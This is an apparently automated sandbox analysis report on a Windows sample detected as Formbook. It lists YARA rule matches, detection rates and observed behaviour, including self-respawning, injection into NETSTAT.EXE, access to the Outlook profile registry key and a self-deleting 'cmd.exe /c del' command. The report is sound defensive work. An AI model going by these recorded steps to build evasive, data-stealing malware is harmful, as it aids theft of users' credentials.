          Source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/0@14/9
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_0041DDA8 GetLastError,FormatMessageA,0_2_0041DDA8
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_00408606 GetDiskFreeSpaceA,0_2_00408606
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeCode function: 0_2_004137F4 FindResourceA,0_2_004137F4
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_01
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: mp0nMsMroT.exeVirustotal: Detection: 47%
          Source: mp0nMsMroT.exeReversingLabs: Detection: 79%
          Source: unknownProcess created: C:\Users\user\Desktop\mp0nMsMroT.exe 'C:\Users\user\Desktop\mp0nMsMroT.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\mp0nMsMroT.exe 'C:\Users\user\Desktop\mp0nMsMroT.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\mp0nMsMroT.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\mp0nMsMroT.exeProcess created: C:\Users\user\Desktop\mp0nMsMroT.exe 'C:\Users\user\Desktop\mp0nMsMroT.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\mp0nMsMroT.exe'Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Binary string: wntdll.pdbUGP source: mp0nMsMroT.exe, 00000001.00000002.232510703.0000000000A90000.00000040.00000001.sdmp, NETSTAT.EXE, 00000005.00000002.451053181.00000000031DF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: mp0nMsMroT.exe, NETSTAT.EXE, 00000005.00000002.451053181.00000000031DF000.00000040.00000001.sdmp

          Data Obfuscation: